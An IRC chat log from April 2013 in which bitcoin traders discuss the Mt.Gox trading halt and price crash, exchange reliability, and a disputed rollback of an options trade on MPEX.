gone Apr 11 22:46:00 then do the next one Apr 11 22:46:07 last I checked it, you can only place orders at market price Apr 11 22:46:09 a few minutesd ? Apr 11 22:46:24 lippoper that sounds like a recipe for disaster. Apr 11 22:46:36 yeah Apr 11 22:46:49 it seems like it'll be DDoS on resume Apr 11 22:46:56 just from sheer Apr 11 22:47:01 volume of people withdrawing Apr 11 22:47:08 could cause true bottom to hit :-( Apr 11 22:47:18 i'm afraid, very afraid of 10pm ET tonight Apr 11 22:47:42 I am going to buy like crazy Apr 11 22:47:50 i am going to fap like crazy Apr 11 22:47:58 I am going to cry some more Apr 11 22:48:08 never waste a good crisis Apr 11 22:48:14 bugpowder will be bust in the trollbox Apr 11 22:48:19 busy Apr 11 22:48:24 but, all my money just became worthless Apr 11 22:48:40 really though? Apr 11 22:48:50 not ALL, but all the investment money and then some I had Apr 11 22:48:59 like it's half now Apr 11 22:49:01 Well 1, you should have cashed out all the way up Apr 11 22:49:10 ;;ticker Apr 11 22:49:11 BTCUSD ticker | Best bid: 118.95000, Best ask: 124.90000, Bid-ask spread: 5.95000, Last trade: 124.90000, 24 hour volume: 207674.53841988, 24 hour low: 110.20003, 24 hour high: 203.00000, 24 hour vwap: 158.78790 Apr 11 22:49:12 2) this is going to be an awesome buying opp Apr 11 22:49:12 at $55 Apr 11 22:49:55 apologies for the rudimentary question: Is gribble a bot or something? Apr 11 22:49:58 @ $32 Apr 11 22:49:58 What about bitcoin has fundamentally changed between 2 days ago and today Apr 11 22:50:00 nothing Apr 11 22:50:04 no gribble is cool Apr 11 22:50:24 except, it's apparent market value Apr 11 22:50:31 why is he/it quoting bad info? Apr 11 22:50:41 he's quoting Mt.Gox info only Apr 11 22:51:00 Mt.Gox is frozen, so it's not bad, it's just not what all of the other exchanges are trading at. Apr 11 22:51:12 okay Apr 11 22:51:20 keep some things in mind Apr 11 22:51:25 ;;echo I'm not a bot Apr 11 22:51:25 I'm not a bot Apr 11 22:51:31 ;;ticker Apr 11 22:51:31 lol Apr 11 22:51:32 BTCUSD ticker | Best bid: 118.95000, Best ask: 124.90000, Bid-ask spread: 5.95000, Last trade: 124.90000, 24 hour volume: 207018.49103167, 24 hour low: 110.20003, 24 hour high: 203.00000, 24 hour vwap: 158.87151 Apr 11 22:51:39 1. there is a new market price Apr 11 22:51:43 Hey how come mt gox is 120 bucks Apr 11 22:51:46 but.. the rest is like 60 Apr 11 22:51:47 ? Apr 11 22:51:52 not trading Apr 11 22:51:57 buyers will be very hesitant to pay more than they need to Apr 11 22:51:58 Bowjob_: dude get with the times... gox froze all trads 6 hours ago Apr 11 22:52:06 i just slept lol Apr 11 22:52:09 i mean woke up Apr 11 22:52:11 2. Gox orderbooks will be EMPTY Apr 11 22:52:19 is it moving to coinlab Apr 11 22:52:20 this means the price is free to run Apr 11 22:52:24 ah Apr 11 22:52:28 in any and all directions Apr 11 22:52:38 mostly gox is cash right now Apr 11 22:52:41 it will be mayhem Apr 11 22:52:46 Bowjob_: hopefully it is moving to a darker place Apr 11 22:52:53 so it could run up, but if it does, it will fall right back down Apr 11 22:52:53 like I don't know. a coffin? Apr 11 22:52:55 ah, thanks. no offense intended! just asking why :) Apr 11 22:53:06 the 200DMA @ bitcoin charts shows like 63: http://www.bitcoincharts.com/charts/mtgoxUSD#rg90zig6-hourztgSzbgBza1gTMAzm1g50za2gTMAzm2g200zi1gMACDzi2gWilliamRzi3gCVolatilityzv Apr 11 22:53:07 so that's not far off Apr 11 22:53:24 Bowjob_: ^^ Apr 11 22:53:39 I want to see single digits again Apr 11 22:53:40 i have to try not drink too much before mt gox opens... 10 PM EST, right... Apr 11 22:53:45 I'll buy the shit out of them Apr 11 22:53:47 gonna be crazy Apr 11 22:54:17 mod6: yep - that's what I've been looking at the last 24hrs Apr 11 22:54:25 ThickAsThieves, anyone in the know here will be buying up btc in Mt.Gox for cheap, $10-$50 range... Apr 11 22:54:25 Anyone panicking about the bubble burst (most people) will try to cash out as soon as possible for as cheap as possible. Apr 11 22:54:25 Your cheap investment into btc, will be just that, and it might even go lower. Apr 11 22:54:29 Hello, where abouts could i look to pickup some FPGA units? Apr 11 22:54:46 alex12 never seen anyone trying to sell. Apr 11 22:54:59 lippoper I think it's safe to say that everyone here is in it for the long haul Apr 11 22:55:11 yes Apr 11 22:55:29 lippoper: then how does one obtain them? Apr 11 22:55:30 unfortunately i dont have fiat Apr 11 22:55:50 if btc falls under 50, it could be really bad Apr 11 22:55:58 seems to me that the denizens of #bitcoin-assets *are* the grownups of hitcoin world... Apr 11 22:56:07 thats like hitting reset on this entire run up Apr 11 22:56:16 i hope so Apr 11 22:56:19 alex12: was talking about when Gox resumes tonight. Apr 11 22:56:34 Scrat: Yes, but how long til we see that $100 figure again? Apr 11 22:56:35 bitstamp is down Apr 11 22:56:55 we'll see 100 tonight probably, and then 50 again Apr 11 22:57:04 you're right Apr 11 22:57:09 its gonna be wild Apr 11 22:57:16 or not! Apr 11 22:57:18 :) Apr 11 22:57:20 it will open at 120, so first come first serve Apr 11 22:57:23 lippoper: ah ... Apr 11 22:57:32 it will not open at 120 Apr 11 22:57:37 lippoper: sorry, my message was ment for mircea_popescu Apr 11 22:57:37 only time before the asks outweight the bids and the price drops like a stone. Apr 11 22:57:40 it will open empty Apr 11 22:57:45 maybe just asks Apr 11 22:58:11 such big price discrepancies across exchanges...why aren't these getting arb'd away? Apr 11 22:58:33 first thing I'll do when it resumes is sell at $100 and put in a buy order for $25.00 Apr 11 22:58:36 that sounds right Apr 11 22:58:53 few people were setup to arb that sort of volume Apr 11 22:58:54 it'll probably get filled within the hour Apr 11 22:59:29 thouhts? Apr 11 22:59:31 thoughts? Apr 11 22:59:34 ;;btceusd Apr 11 22:59:35 {"ticker":{"high":199.53999,"low":52.999,"avg":126.269495,"vol":7769078.44047,"vol_cur":64617.31679,"last":70,"buy":70.001,"sell":70,"server_time":1365710367}} Apr 11 22:59:43 is vol total? Apr 11 22:59:44 probably not, i mean i think theres lots of idiots Apr 11 22:59:55 btce did today almost 10% of their total volume Apr 11 22:59:56 but.. come on man i have faith in my fellow man Apr 11 23:00:12 Its 94 at virtex Apr 11 23:00:17 1%, bah Apr 11 23:00:26 nevermind me Apr 11 23:00:39 eyes tired Apr 11 23:02:02 [MPEX] [S.MPOE] 1461 @ 0.00070902 = 1.0359 BTC [-] Apr 11 23:03:00 ThickAsThieves: If it falls under 50 it could be really good. Apr 11 23:06:03 [HAVELOCK] [HIM] 2 @ 1.65 = 3.3 BTC [+] Apr 11 23:07:24 http://bitbet.us/bet/403/bitcoin-at-420-on-or-before-4-20/ Apr 11 23:07:30 FREE BTC for you guys Apr 11 23:07:31 Bug, I agree Apr 11 23:07:38 only because Apr 11 23:07:41 just noticed that BFL's preorder prices for "net gen" products jumped from $20 GH/s to $50 GH/s... Dunno when that happened, but economic of mining are changing fast... Apr 11 23:07:41 i dont care about price now Apr 11 23:07:46 i'm cashed out Apr 11 23:07:50 waiting for lowest price Apr 11 23:08:09 all mt btc is what i have in stocks Apr 11 23:08:22 lucky Apr 11 23:09:16 honestly, my buying will be pretty timid Apr 11 23:09:19 on ht ebright side. the next bullrun will be Apr 11 23:09:24 i cashed out at a healthy profit Apr 11 23:09:25 quad digits Apr 11 23:09:36 i'm not gonna go pay some midmarket price Apr 11 23:09:40 and compromise that Apr 11 23:10:12 I'm still wondering if we;re emperor with no clothes Apr 11 23:10:15 just sit on your hands folks... Apr 11 23:10:27 be patient Apr 11 23:10:35 I mean, I've won the game, money in, profit out Apr 11 23:11:00 can't be Apr 11 23:11:10 quoting from gox? Apr 11 23:11:27 it doesn't have funds Apr 11 23:11:31 yeah it's gox last Apr 11 23:11:46 bug, did u get some puts Apr 11 23:11:58 I did Apr 11 23:12:03 but the trade was revoked Apr 11 23:12:06 tiberiusiv> btce did 50% of mtgox volume today Apr 11 23:12:08 and no lag! Apr 11 23:12:11 O.o Apr 11 23:12:32 russian tech Apr 11 23:12:55 your buy and the bot's cancelling hit in the same second. the bot was a few miliseconds earlier. the trade engine correctly identified the trade as going to book. the server you were talking to however did not. [14:09] it's ungodly that it has needed almost two hours to come to sense, there's been a host of syncing issues under today;s load. Apr 11 23:13:07 ? Apr 11 23:13:09 ? Apr 11 23:13:17 Did you get a receipt? Apr 11 23:13:19 i think mp covering his ass Apr 11 23:13:21 :p Apr 11 23:13:21 I did Apr 11 23:13:25 sooooo Apr 11 23:13:39 thats proof of purchase right? Apr 11 23:13:43 have reciepts for the options on my inventory for the last hour and a half Apr 11 23:14:04 then they disappeared Apr 11 23:14:09 ?! Apr 11 23:14:11 wait Apr 11 23:14:18 receipts can be revoked? Apr 11 23:14:33 i thought they were signed text info Apr 11 23:14:42 So be aware, a receipt is not always reliable. Apr 11 23:14:50 ... Apr 11 23:14:54 there could be syncronization issues in times of heavy load Apr 11 23:15:03 but thats not your problem Apr 11 23:15:14 server should not issue receipt Apr 11 23:15:20 until order is confirmed Apr 11 23:15:29 makes no sense Apr 11 23:15:59 $avg Apr 11 23:16:00 taub: 142.71 Apr 11 23:16:03 uh oh Apr 11 23:16:11 Bakewell might pay his dues now Apr 11 23:16:12 lol Apr 11 23:16:20 just say "I got hackeD" Apr 11 23:16:27 heres ur coins Apr 11 23:16:33 this is also conveniently when price was dropping this morning, bot was off, yet bitcoincharts was working fine, then bot comes back at 1000000% higher prices Apr 11 23:17:02 thats a pretty fancy bot... Apr 11 23:17:04 well that is his business Apr 11 23:17:06 but Apr 11 23:17:11 undoing orders is not ok Apr 11 23:17:40 what can yah do? I've made plenty of coins off the bot. Maybe its true. The bot did go down shortly after I bot 1000 puts. Apr 11 23:17:53 orders get busted irl all the time Apr 11 23:17:59 http://dealbook.nytimes.com/2013/04/11/as-big-investors-emerge-bitcoin-gets-ready-for-its-close-up/ Apr 11 23:18:01 your buys are what triggered me to shop though Apr 11 23:18:05 i loaded prices after Apr 11 23:18:14 and when i hit buy i was too late Apr 11 23:18:22 Whether that happened before or after the actual bot cancellation, I have no way of knowing Apr 11 23:18:38 i still dont see how that matters if you got a receipt Apr 11 23:18:38 the winklevii own 1% of bitcoin Apr 11 23:18:44 according to ny times Apr 11 23:19:06 Was the bot going offline a response to the purchase coming across the ticker here? Or was it just a coincidence? Apr 11 23:19:31 damn winklevii Apr 11 23:19:38 guys - equity, option and futures exchanges bust trades for all sorts of reasons everyday all day long... Apr 11 23:19:38 always showing up late to the party Apr 11 23:19:50 well if I play the role of Occam in a Tinfoil Hat, Apr 11 23:20:07 easy answer is mp shut off bot manually to protect puts Apr 11 23:20:15 adjusted pricing to be to his benefit Apr 11 23:20:19 then resumed Apr 11 23:20:22 yes yes, it can happen that a trade's screwy. Apr 11 23:20:38 it hasn't been happening since the january upgrade at all, but then again Apr 11 23:21:38 Apr 11 12:27:12 okay, everyone get your trades through if you were contemplating anything Apr 11 23:21:38 Apr 11 12:27:16 this promises to be a bumpy weekend. Apr 11 23:21:53 we deal with occasional race condition-type issues from time to time - happens Apr 11 23:22:04 but surely your system is gated to only give receipts as proof of confirmed purchase, no? Apr 11 23:22:31 i assume thats why they exist Apr 11 23:22:35 unless, of course, you prefer a single threaded, single server solution for your exchange... Apr 11 23:22:58 like gox Apr 11 23:23:22 if not, i dont understand what receipts are for Apr 11 23:23:48 ThickAsThieves ideally. Apr 11 23:23:54 it;'s like the papers you get from the courthouse. Apr 11 23:24:03 somwetimes they will have your name wrong Apr 11 23:24:05 pgp: which should still be enough, considering modern cpus can do billions of calculations per second Apr 11 23:24:14 sometimes the police batters down your door and you were the wrong guy. Apr 11 23:24:24 The Black wednesday Apr 11 23:24:26 material errors happen. my job of course is to keep it to a minimum. Apr 11 23:24:26 even if you add many orders of magnitude of abstraction Apr 11 23:24:47 http://www.businessinsider.com/the-winklevoss-twins-bitcoins-2013-4 Apr 11 23:24:51 yes, but no redundancy and failover... Apr 11 23:25:09 mp, i dont disagree that things happen, Apr 11 23:25:14 but in your examples Apr 11 23:25:22 can't run an exchange that way - you can't have single points of failure... Apr 11 23:25:24 the offender loses too Apr 11 23:25:30 pgp: a true multimaster system requires two phased commits Apr 11 23:25:35 It's a shame that the bot does not have a timestamped receipt to compare against mine. Apr 11 23:25:51 master/slave can still be done with single threaded setup Apr 11 23:25:53 wouldnt matter of being the same second causes glitches Apr 11 23:26:02 ThickAsThieves well the bot got in first. Apr 11 23:26:31 so receipts are issued before orders are completed? Apr 11 23:27:03 [HAVELOCK] [SDICE] 5 @ 0.34495 = 1.7248 BTC [-] Apr 11 23:27:04 [HAVELOCK] [SDICE] 20 @ 0.34498 = 6.8996 BTC [+] Apr 11 23:27:06 [HAVELOCK] [SDICE] 1 @ 0.34499989 BTC [+] Apr 11 23:27:06 receipt of trade just says trade was received. Apr 11 23:27:07 [HAVELOCK] [SDICE] 10 @ 0.345 = 3.45 BTC [+] Apr 11 23:27:08 [HAVELOCK] [SDICE] 30 @ 0.35 = 10.5 BTC [+] Apr 11 23:27:09 this is factual, it was. Apr 11 23:27:11 scrat: yes in principal Apr 11 23:27:18 the STAT results will query a db, which will be in a state. Apr 11 23:27:31 I find it somewhat ironic that they store their bitcoin backups at banks Apr 11 23:27:32 it is possible (if unlikely) these days for that state to be messy Apr 11 23:27:38 but not all systems have fully integrated STP Apr 11 23:27:38 mp, sorry to do this again, deposit Apr 11 23:27:43 but mp, Apr 11 23:27:53 why not gate the receipt to happen AFTER Apr 11 23:28:05 mpex is stateless. there Apr 11 23:28:07 its not like we need our recipts 1 second sooner Apr 11 23:28:13 's no way to know what happened to the guy's trade when you issue the receipt. Apr 11 23:28:23 receipt just says "we received your order". this isn't really the problem. Apr 11 23:28:39 so its not a receipt Apr 11 23:28:41 the problem is the webserver he was directed to for the stat was inconsistent weith the trade engine master Apr 11 23:28:43 its a purchase order Apr 11 23:28:46 and this inconsistency lasted too long Apr 11 23:29:30 the reason it lasted too long is that the server itself was being isolated from syncing through being ddosed to as much as it could take Apr 11 23:29:35 by the load balancing solution Apr 11 23:29:45 i assume he was at least refunded Apr 11 23:30:01 THe initial purchase was refunded Apr 11 23:30:09 and an order appeared Apr 11 23:30:30 what does that mean, an order appeared Apr 11 23:31:25 mp, do you have a log of when the bot vwap lowered from 227.18 yesterday? Apr 11 23:31:26 O.USD.P122T : B 1`000 @ 0.07047095BTC (order #8912799) Apr 11 23:31:30 That appeared Apr 11 23:32:29 However my original order number was lower Apr 11 23:33:56 You see, following my 122 order, I placed this order, which did not get filled Apr 11 23:33:57 O.USD.P125T : B 1`000 @ 0.08050000BTC (order #8901197) Apr 11 23:34:02 [MPEX] [S.DICE] 2159 @ 0.00296405 = 6.3994 BTC [-] Apr 11 23:34:11 or did it? Apr 11 23:34:12 hehe Apr 11 23:34:20 No bot was down by then Apr 11 23:34:45 ThickAsThieves, so you were affected too? Apr 11 23:35:02 [HAVELOCK] [SDICE] 9 @ 0.3151 = 2.8359 BTC [-] Apr 11 23:35:11 by what Apr 11 23:35:21 jurov you know about my issue already Apr 11 23:35:41 i did try to buy puts at the same time as Bug, but I was too late Apr 11 23:35:45 i have no issue with that Apr 11 23:35:49 yes. but am tired and the scrollback looks hairy Apr 11 23:35:57 other than it being suspicious Apr 11 23:36:04 that the bot disappeared for so lonbg Apr 11 23:36:15 and came back with outrageously high prices Apr 11 23:36:26 [BTCTC] [S.DICE-PT] 218 @ 0.0033 = 0.7194 BTC [+] Apr 11 23:36:42 so these trades got rofled back? Apr 11 23:36:53 Yes looks like it now Apr 11 23:37:04 I didn't notice this order number discrepancy before Apr 11 23:37:10 when I discussed it privately Apr 11 23:37:52 hmm, coinbr did complain about more inconsistencies than necessary, but looked quite benign Apr 11 23:38:13 After the trade rollback, a NEW order appeared with a # that was higher than an order I placed AFTER my fill at 122 Apr 11 23:38:35 O.o Apr 11 23:39:07 nice, looks like s.dice is rallying Apr 11 23:39:35 now i have to go back and audit all my fucking excercises Apr 11 23:40:12 anyway, will do thorough check later. but it would help me if anyone who did anything in coinbr during that time Apr 11 23:40:17 checked their history Apr 11 23:40:47 can't hurt anything. Apr 11 23:41:13 can't help either most likely Apr 11 23:41:31 you aren't exactly known for being pliable Apr 11 23:41:34 it will help me not to have a mess in books eventually Apr 11 23:41:45 ThickAsThieves, what? Apr 11 23:41:52 not you jurov Apr 11 23:42:37 i just mean that we make plenty of reasonable requests and suggestions that end up being painted as absurd of they conflict with mp's original decision Apr 11 23:42:50 like not issuing receipts until orders are completed Apr 11 23:42:51 ++ ThickAsThieves ;) not pliable....but consistent. Apr 11 23:42:56 indeed Apr 11 23:43:05 thats why i know auditing would be pointless Apr 11 23:43:18 ha! Apr 11 23:43:22 not going into that discussion now... see ya later Apr 11 23:43:41 seems everyone's trade engines were hosed yesterday..I know I should audit my trades Apr 11 23:44:41 i'd really love to come up with a better system Apr 11 23:44:51 for one thing the 100msecond lag is getting on my motherfucking nerves. Apr 11 23:45:05 i get that it's way lower than mtgox ever manages, but still. ridoinculous. Apr 11 23:45:35 i have real trouble understanding why a receipt cant be the last thing that happens in the chain Apr 11 23:45:53 cause mpex doesn't keep session. Apr 11 23:45:54 mircea_popescu: you're closer than I am, how much would it take to get you to kick icbit admin in the nuts? Apr 11 23:46:04 a lot lol. im not in that biz Apr 11 23:46:15 everyone has their price right? ;) Apr 11 23:47:09 [BTCTC] [CRYPTO-TRADE] 42 @ 0.2 = 8.4 BTC [+] Apr 11 23:47:29 I am so glad I closed out my positions there last week Apr 11 23:47:56 i signed up for coinsetter and sent a witty message Apr 11 23:48:00 ceo responded Apr 11 23:48:07 he says they are legit Apr 11 23:48:18 what's coinsetter? Apr 11 23:48:20 his name is jaron iirc Apr 11 23:48:21 I've had a chat with him in email - everyone sez that Apr 11 23:48:27 ya that's it Apr 11 23:48:33 oh well if the ceo says he's legit, its gotta be true Apr 11 23:48:37 it's th new bitcoinica pigeons Apr 11 23:48:40 rite Apr 11 23:48:40 coinsetter = leveraged trading of some sort Apr 11 23:49:01 if you think things are wild now...just wait Apr 11 23:49:02 chinese relic hunters be ready Apr 11 23:49:04 he said he's on the forums & recognized my name - but I didn't recognize his Apr 11 23:49:12 and he didn't specifiy a nick Apr 11 23:49:25 he meant something awful Apr 11 23:49:33 hurrr Apr 11 23:49:52 their site was broke when I went there at first...tweeted about that, and he responded to the tweet & sent mail Apr 11 23:49:58 [BTCTC] [S.MPOE-PT] 100 @ 0.000688 = 0.0688 BTC [+] Apr 11 23:50:02 [BTCTC] [S.MPOE-PT] 100 @ 0.000688 = 0.0688 BTC [+] Apr 11 23:50:03 [HAVELOCK] [VTX] 1 @ 0.31 BTC [+] Apr 11 23:50:03 ic Apr 11 23:50:05 that's nice. Apr 11 23:50:23 mircea_popescu's twitter is off the charts lulzbot Apr 11 23:50:27 *lulzboat Apr 11 23:50:30 lol Apr 11 23:50:33 gonna have to follow him for sure Apr 11 23:51:03 [HAVELOCK] [VTX] 1 @ 0.3031 BTC [-] Apr 11 23:51:06 yeah Apr 11 23:51:10 love the tweets Apr 11 23:51:13 i've had lunch with jaron Apr 11 23:51:23 ya orly Apr 11 23:51:28 yep Apr 11 23:51:29 he's in nyc Apr 11 23:51:35 what's he like? Apr 11 23:51:35 does he wear baseball caps? Apr 11 23:51:37 erik kinda introduced us Apr 11 23:51:41 he does not Apr 11 23:51:44 wear baseball caps Apr 11 23:51:47 from what i saw Apr 11 23:51:53 but i haven't watched him at all times Apr 11 23:51:58 anyway, nice guy Apr 11 23:52:02 [HAVELOCK] [VTX] 1 @ 0.303 BTC [-] Apr 11 23:52:04 cool people behind his project Apr 11 23:52:15 haven't seen much of his product Apr 11 23:52:28 but he is working on it as far as i know Apr 11 23:52:36 meet any of the team? Apr 11 23:52:40 yeahg Apr 11 23:52:41 CTO Apr 11 23:52:43 nice guy Apr 11 23:52:52 we had lunch a few times Apr 11 23:53:03 [HAVELOCK] [VTX] 22 @ 0.30199999 = 6.644 BTC [-] Apr 11 23:53:27 i wonder if we can get these guys to do shoeonhead.jpg Apr 11 23:53:30 I'm curious about his & the cto's backgrounds Apr 11 23:53:34 to prove something... Apr 11 23:54:17 [BTCTC] [S.MPOE-PT] 270 @ 0.000689 = 0.186 BTC [+] Apr 11 23:55:25 he seemed to think I'd be more interested in the site's security, rather than the principal's backgrounds Apr 11 23:55:52 eh Apr 11 23:56:00 what's tux's background? Apr 11 23:56:01 what's the CTOs name MJR_? Apr 11 23:56:07 marshall Apr 11 23:56:08 yeah btcst.com was hella secure html5 wonder Apr 11 23:56:13 ... Apr 11 23:56:23 good question. Apr 11 23:56:25 MJR_: table/card games, painting little plastic soldiers Apr 11 23:56:29 glbse was pretty secure but slows as balls Apr 11 23:56:31 he actually introduced me to a nice lawyer Apr 11 23:56:35 who was very helpful Apr 11 23:56:55 exactly jcpham Apr 11 23:57:06 making a secure site isn't that hard Apr 11 23:57:12 they very much have a startup mentality Apr 11 23:57:17 which is cool in some ways Apr 11 23:57:17 i've seen it and bought into it Apr 11 23:57:22 and then poof Apr 11 23:57:25 that's good in a lot of ways Apr 11 23:57:29 [MPEX] [S.MPOE] 4730 @ 0.00071589 = 3.3862 BTC [+] Apr 11 23:57:30 [MPEX] [S.MPOE] 3888 @ 0.00071642 = 2.7854 BTC [+] Apr 11 23:57:31 well...depends Apr 11 23:57:43 i personally, and this is just my opinion, hate the term "burn rate" Apr 11 23:57:50 i plan on making money from day 1 Apr 11 23:57:52 lol Apr 11 23:57:58 VC Apr 11 23:58:06 BUT, there are some times when you need to do that Apr 11 23:58:07 [BTCTC] [S.DICE-PT] 50 @ 0.0034 = 0.17 BTC [+] Apr 11 23:58:19 I've done a buncha dotcom stuff and we always talked about that Apr 11 23:58:33 i just think that the silicon valley mindset of "let them explore and figure it out" is not a great strategy for most scenarios Apr 11 23:58:55 in some ways, VC's do a disservice by telling people that they are great, when they haven't done anything yet Apr 11 23:59:04 [BTCTC] [S.DICE-PT] 2 @ 0.0034 = 0.0068 BTC [+] Apr 11 23:59:06 BUT...i'm not saying that applies to coinsetter Apr 11 23:59:06 [BTCTC] [COGNITIVE] 9 @ 0.12002 = 1.0802 BTC [-] Apr 11 23:59:08 no - it's not, but it's great for the "thow a buncha shit on the wall and see what sticks" venture capitalist mentality Apr 11 23:59:11 just making a point about startup mentality Apr 11 23:59:35 i also don't like that mentality, i like good solid plans that make sense Apr 11 23:59:43 no but wee'll see plenty silicon valley startups that it does apply to in the bitcoin biz Apr 11 23:59:56 entrepreneurship should be bringing together the pieces to create something more valuable than the sum of its parts Apr 12 00:00:08 it is the hot ticket item of the day Apr 12 00:00:12 but we will see Apr 12 00:00:19 successful startups do have a plan - it's the VCs who often don't Apr 12 00:00:30 i personally think that if you aren't in the irc channel, learning, and actually care about bitcoin, it will show Apr 12 00:00:39 SUCCESSFUL startups Apr 12 00:00:41 how many aren't Apr 12 00:00:42 I have to agree. Apr 12 00:00:43 but still got funded Apr 12 00:00:46 most Apr 12 00:00:47 and had a decent "burn rate" Apr 12 00:00:48 :D Apr 12 00:01:02 like...I work 16 hours a day Apr 12 00:01:07 i use my salary to fund my life Apr 12 00:01:16 and i expect to reap the rewards from my equity Apr 12 00:01:19 fuck a salary IMO Apr 12 00:01:31 but that is my mentality, i'm not used to people giving you money to make your dreams come true Apr 12 00:01:43 cannot get rich and have a life? Apr 12 00:01:56 well...you can, i am not saying that it doesn't work out well in some cases Apr 12 00:02:00 I have to earn money from my business......no two ways about it - no burn rate possible here Apr 12 00:02:05 i'm just saying, i'm doing what i love because i love it Apr 12 00:02:12 i do what i have to in order to make money Apr 12 00:02:17 soon they will both be the same thing Apr 12 00:02:21 but till then, work harder Apr 12 00:02:24 work smarter Apr 12 00:02:47 lol - I live in a tiny little town ....there's no jobs....gotta make your own. Apr 12 00:03:04 so bitcoin is my job Apr 12 00:03:26 guruvan: cool! Apr 12 00:03:36 ;;ticker Apr 12 00:03:36 BTCUSD ticker | Best bid: 118.95000, Best ask: 124.90000, Bid-ask spread: 5.95000, Last trade: 124.90000, 24 hour volume: 175853.75589845, 24 hour low: 110.20003, 24 hour high: 203.00000, 24 hour vwap: 159.51856 Apr 12 00:03:45 hell yea....I haven't done anything else for a year Apr 12 00:04:09 (I haven't been all that flush for a lot of it, but I only started with $1500) Apr 12 00:06:09 wait, what? http://dealbook.nytimes.com/2013/04/11/as-big-investors-emerge-bitcoin-gets-ready-for-its-close-up/ Apr 12 00:06:20 lulz article Apr 12 00:06:22 yes Apr 12 00:06:27 the winklevii Apr 12 00:06:35 howmuch till the gox opens again? Apr 12 00:06:39 many factual errors Apr 12 00:06:43 8h? Apr 12 00:06:48 kakobrekla: 5-6hrs? Apr 12 00:06:48 masters of subversion, now out of the crypto-closet Apr 12 00:07:24 est is now 4pm Apr 12 00:07:25 lool.....masters of getting ripped off Apr 12 00:07:31 it starts at 2am Apr 12 00:07:33 5pm Apr 12 00:08:00 oh eSt - Apr 12 00:08:32 oh no it was utc Apr 12 00:08:35 wtf Apr 12 00:08:55 aha so 5h Apr 12 00:08:56 bah Apr 12 00:09:07 heh Apr 12 00:10:43 well, i sent a small amount to Gox, 9 confirms - no show in my account Apr 12 00:11:04 doesn't seem surprising Apr 12 00:11:07 so, 5-6 hours - I am not thinking is going to work out well for them Apr 12 00:11:42 well....opening up the floodgates for pent-up demand is reeeealy hard on big systems like they have Apr 12 00:12:03 [HAVELOCK] [VTX] 1 @ 0.3375 BTC [+] Apr 12 00:12:03 [HAVELOCK] [VTX] 1 @ 0.3399999 BTC [+] Apr 12 00:12:04 yes, I dont think 5-6 hours it is going to happen Apr 12 00:12:05 [HAVELOCK] [VTX] 2 @ 0.34 = 0.68 BTC [+] Apr 12 00:13:02 [HAVELOCK] [VTX] 1 @ 0.34 BTC [+] Apr 12 00:15:48 which alts are better? Apr 12 00:15:54 bitfloor stole 25k Apr 12 00:16:01 btce is in russia Apr 12 00:16:10 so russia Apr 12 00:16:36 whats the 25k bitfloor story? i have some cash there... Apr 12 00:16:41 said scumbag maintains a presence in irc Apr 12 00:16:49 where btce? Apr 12 00:17:02 ThickAsThieves: bitfloor got hacked, said sorry, your moneys gone, come trade with us anyway Apr 12 00:17:35 "got hacked" in the bitcoin sense, where who knows if its true mybitcoin Apr 12 00:18:01 btce got hacked and lost money but they ate it Apr 12 00:18:39 the alternatives are only better the rare occasions thye have enough depth Apr 12 00:25:43 Bugpowder: I've been using btc-e - I wish to god they had 2FA, but man....they have some DDOS protection. Apr 12 00:26:21 tough if you need easy usd in or out, but you're trading for btc you can do well with trade fees only .2% Apr 12 00:29:19 you know, it's like MPEX exchange membership is on sale.... Apr 12 00:30:02 should raise the price ;) Apr 12 00:32:05 I won't use anywhere without 2FA. I have too much on gox right now Apr 12 00:32:22 or GPG Apr 12 00:32:29 that is also acceptable Apr 12 00:33:05 yeah - I feel that...I usually keep my btc-e acct cleaned out.....I don't hold anything there Apr 12 00:33:32 micrea_popescu , deposit flushed Apr 12 00:33:42 jborkl_ on it Apr 12 00:33:57 I'd really prefer gpg everywhere instead of authenticator or yubikeys Apr 12 00:34:20 yea. Apr 12 00:34:31 thank you Apr 12 00:37:43 [MPEX] [S.DICE] 2000 @ 0.00333332 = 6.6666 BTC [+] Apr 12 00:37:44 [MPEX] [S.DICE] 1000 @ 0.00333333 = 3.3333 BTC [+] Apr 12 00:39:36 aaand flushed./ Apr 12 00:44:12 aaand its gone Apr 12 00:44:47 nNotice how btc-e has been running on 50% gox volume the last couple hours without having "success"? Apr 12 00:45:11 To make myself feel better.... I present my trades of yesterday Apr 12 00:45:46 lol i know right Apr 12 00:45:52 http://i.imgur.com/TfSNGC5.png Apr 12 00:46:03 yellow is buy Apr 12 00:46:06 blue is sell Apr 12 00:46:31 5% of total stack in each Apr 12 00:46:34 trade Apr 12 00:46:58 must not get jealous Apr 12 00:47:02 nice trades Apr 12 00:47:04 nice work Apr 12 00:47:10 how did you feel out the first buy? Apr 12 00:47:23 just the stagnation? Apr 12 00:47:42 prolly also depth showing orders Apr 12 00:47:50 goxlag was dropping fast and we had a little bounce of 105 Apr 12 00:48:15 tough part is getting the orders in 10-15 minutes before they need to go off. Apr 12 00:48:21 rofl Apr 12 00:48:24 lmao Apr 12 00:48:41 nice Apr 12 00:50:02 [HAVELOCK] [VTX] 1 @ 0.345 BTC [+] Apr 12 00:51:20 bugpowder... how do you trade call/puts and Gox so well? Apr 12 00:51:58 I'm doing well on that too... at least I'm on the green overall. But I'm not that accurate =P Apr 12 00:52:02 [HAVELOCK] [VTX] 1 @ 0.3799999 BTC [+] Apr 12 00:52:03 [HAVELOCK] [VTX] 2 @ 0.38 = 0.76 BTC [+] Apr 12 00:52:05 [HAVELOCK] [VTX] 30 @ 0.3871 = 11.613 BTC [+] Apr 12 00:52:05 [HAVELOCK] [VTX] 10 @ 0.38999 = 3.8999 BTC [+] Apr 12 00:52:06 [HAVELOCK] [VTX] 5 @ 0.39 = 1.95 BTC [+] Apr 12 00:52:07 [HAVELOCK] [VTX] 2 @ 0.39798 = 0.796 BTC [+] Apr 12 00:52:27 I sold VTX at 0.20 ... in the low Apr 12 00:52:45 But then sold the BTC for USD at 250 =P Apr 12 00:54:03 50 bux a vtx share Apr 12 00:54:05 how can you go wrong. Apr 12 00:54:28 100 000 x 50 = 5 million! Apr 12 00:54:32 nice valuation Apr 12 00:56:10 Namworld: Genetic superiority Apr 12 00:56:23 I was born lucky Apr 12 00:57:11 either that or I have been burned enough to learn common patterns, and have cashed out enough so that I'm comfortable making big bets without pissing myself Apr 12 00:57:43 The sharp move followed by osciallation is classic though Apr 12 00:57:47 [MPEX] [S.MPOE] 3866 @ 0.00071642 = 2.7697 BTC [+] Apr 12 00:57:49 [MPEX] [S.MPOE] 10834 @ 0.00071795 = 7.7783 BTC [+] Apr 12 00:58:25 Also I bougt on gox today at 121, right 